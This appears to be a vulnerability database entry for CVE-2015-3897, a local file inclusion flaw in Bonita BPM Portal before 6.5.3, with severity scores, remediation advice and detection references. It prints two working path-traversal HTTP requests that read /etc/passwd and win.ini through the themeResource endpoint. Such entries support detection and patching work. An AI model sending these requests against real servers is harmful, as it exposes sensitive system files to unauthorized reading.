🔙 목록으로 돌아가기

CVE-2015-3897: Bonita BPM Portal <6.5.3 - Local File Inclusion

TitleBonita BPM Portal <6.5.3 - Local File Inclusion
Author0x_Akoko
SeverityMedium
ImpactAn attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
RemediationUpgrade Bonita BPM Portal to version 6.5.3 or later to mitigate the vulnerability.
CVSS Score5
EPSS Score0.6034
CVE IDCVE-2015-3897
CWE IDCWE-22
Tags cve2015 cve unauth packetstorm bonita lfi bonitasoft vkev vuln

🔍 Vulnerability Description

Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource.

🌐 HTTP Request

GET /bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:139.0) Gecko/20100101 Firefox/139.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.4
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-3897.yaml

🦈 Packet Capture: ⬇️ Download cve-2015-3897.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A